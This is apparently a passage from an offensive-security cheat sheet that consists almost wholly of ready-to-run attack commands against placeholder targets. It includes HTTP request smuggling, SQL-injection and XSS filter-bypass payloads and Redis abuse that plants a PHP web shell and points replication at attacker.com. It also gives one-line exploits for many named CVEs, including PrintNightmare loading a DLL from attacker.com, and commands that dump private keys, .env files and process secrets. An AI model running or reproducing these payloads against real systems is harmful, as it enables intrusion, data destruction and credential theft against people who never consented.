SECTION 46: HTTP REQUEST SMUGGLING
CVE-2019-18277 | MITRE: T1190
================================================================
curl -X POST http://target.com/ -H "Transfer-Encoding: chunked" -H "Content-Length: 6" -d "3\r\nabc\r\n0\r\n\r\nGET /admin HTTP/1.1\r\nHost: target.com\r\n\r\n"
python3 request_smuggling.py --url http://target.com --type CL.TE
python3 request_smuggling.py --url http://target.com --type TE.CL
================================================================
SECTION 47: WAF BYPASS TECHNIQUES
MITRE: T1027
================================================================
' oR '1'='1
'/**/OR/**/1=1--
'/**/UNION/**/SELECT/**/NULL,NULL--
<ScRiPt>alert(1)</ScRiPt>
<script/src=//attacker.com/xss.js>
%3Cscript%3Ealert%281%29%3C%2Fscript%3E
&#x3C;script&#x3E;alert(1)&#x3C;/script&#x3E;
\x3cscript\x3ealert(1)\x3c/script\x3e
================================================================
SECTION 48: REDIS AND DATABASE UNAUTHENTICATED ACCESS
MITRE: T1190 T1505
================================================================
redis-cli -h target.com FLUSHALL
redis-cli -h target.com SET mykey "<?php system($_GET['cmd']); ?>"
redis-cli -h target.com CONFIG SET dir /var/www/html
redis-cli -h target.com CONFIG SET dbfilename shell.php
redis-cli -h target.com SAVE
redis-cli -h target.com SLAVEOF attacker.com 6379
redis-cli -h target.com CONFIG SET requirepass ""
mongo target.com --eval "db.adminCommand({listDatabases:1})"
mongo target.com/admin --eval "db.system.users.find()"
================================================================
SECTION 49: RECENT HIGH-PROFILE CVEs
================================================================
CVE-2022-1388 F5 BIG-IP Auth Bypass RCE CVSS 9.8
curl -sk -X POST https://target.bigip.com/mgmt/tm/util/bash -H "Authorization: Basic YWRtaW46" -H "X-F5-Auth-Token: " -H "Content-Type: application/json" -d '{"command":"run","utilCmdArgs":"-c id"}'
CVE-2022-26134 Confluence OGNL Injection RCE CVSS 9.8
curl "http://target.com/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28new%20String%5B%5D%7B%22id%22%7D%29.getInputStream%28%29%2C%22utf-8%22%29%29%7D/"
CVE-2023-34362 MOVEit Transfer SQLi RCE CVSS 9.8
curl -X POST "https://target.com/guestaccess.aspx" -d "LoginBtn=Login&userid=';EXEC+xp_cmdshell('whoami')--"
CVE-2024-3400 Palo Alto PAN-OS Command Injection CVSS 10.0
curl "https://target.com/ssl-vpn/hipreport.esp" -H "X-Pan-Token: AAAAAAAAAA/../../../../opt/panlogs/tmp/device_telemetry/hour/aaa`id`"
CVE-2023-44487 HTTP/2 Rapid Reset DoS CVSS 7.5
python3 http2_rapid_reset.py --target target.com --streams 1000 --duration 30
CVE-2023-4966 Citrix Bleed Netscaler Session Token Leak CVSS 9.4
python3 citrix_bleed.py --url https://target.com
CVE-2021-22205 GitLab RCE via ExifTool CVSS 10.0
python3 CVE-2021-22205.py http://gitlab.target.com shell.jpg
CVE-2024-1709 ConnectWise ScreenConnect Auth Bypass CVSS 10.0
curl "http://target.com/SetupWizard.aspx/../../../App_Extensions/admin/script.js" -v
CVE-2023-27350 PaperCut RCE CVSS 9.8
curl -X POST "http://target.com:9191/app?service=page/PrinterList" -H "Authorization: " -d "service=direct/1/PrinterList/selectPrinter"
CVE-2024-21887 Ivanti ConnectSecure Command Injection CVSS 9.1
curl -X POST "https://target.com/api/v1/totp/user-backup-code/../../license/keys-status/" -H "X-Forwarded-For: 127.0.0.1" -d '{"license":"test"}'
CVE-2023-22518 Atlassian Confluence Improper Authorization CVSS 9.1
curl -X POST "http://target.com/json/setup-restore.action" -H "Content-Type: multipart/form-data" -F "file=@malicious_backup.zip"
CVE-2022-41040 CVE-2022-41082 ProxyNotShell Exchange CVSS 8.8
curl -k "https://exchange.target.com/autodiscover/autodiscover.json?@evil.com/powershell/?X-Rps-CAT=<encoded_token>"
CVE-2021-42278 CVE-2021-42287 noPac AD Privilege Escalation CVSS 8.8
python3 noPac.py domain/user:password -dc-ip 192.168.1.10 --impersonate Administrator -dump
CVE-2021-36942 PetitPotam NTLM Coerce Authentication
python3 PetitPotam.py -u user -p password attacker-ip 192.168.1.10
CVE-2021-34527 PrintNightmare Windows Print Spooler RCE CVSS 8.8
python3 CVE-2021-34527.py domain/user:password@192.168.1.10 '\\attacker.com\share\malicious.dll'
CVE-2024-23897 Jenkins Arbitrary File Read RCE CVSS 9.8
java -jar jenkins-cli.jar -s http://jenkins.target.com connect-node '@/etc/passwd'
java -jar jenkins-cli.jar -s http://jenkins.target.com groovy = <<< "println 'id'.execute().text"
CVE-2022-47966 ManageEngine SAML RCE CVSS 9.8
curl -X POST "http://target.manageengine.com/SamlResponseServlet" --data "SAMLResponse=<malicious_base64_saml>"
================================================================
SECTION 50: SENSITIVE DATA DISCOVERY
MITRE: T1552 T1083
================================================================
grep -rn "api_key\|api_secret\|access_key\|secret_key" /var/www/ 2>/dev/null
find / -name ".env" 2>/dev/null -exec cat {} \;
find / -name "*.pem" -o -name "*.key" -o -name "id_rsa" 2>/dev/null | xargs cat 2>/dev/null
find / -name "config.php" -o -name "settings.py" -o -name "database.yml" 2>/dev/null | xargs cat 2>/dev/null
cat /proc/*/environ 2>/dev/null | tr '\0' '\n' | grep -iE "pass|secret|key|token"
env | grep -iE "pass|secret|key|token|cred"
strings /proc/*/maps | grep -i password
find / -type f -name "wp-config.php" 2>/dev/null | xargs cat 2>/dev/null
find / -name ".git/config" 2>/dev/null | xargs cat 2>/dev/null
find / -name "id_rsa" -o -name "*.ppk" 2>/dev/null | xargs cat 2>/dev/null
cat /root/.mysql_history 2>/dev/null
cat /root/.psql_history 2>/dev/null
history | grep -iE "pass|ssh|mysql|ftp|token"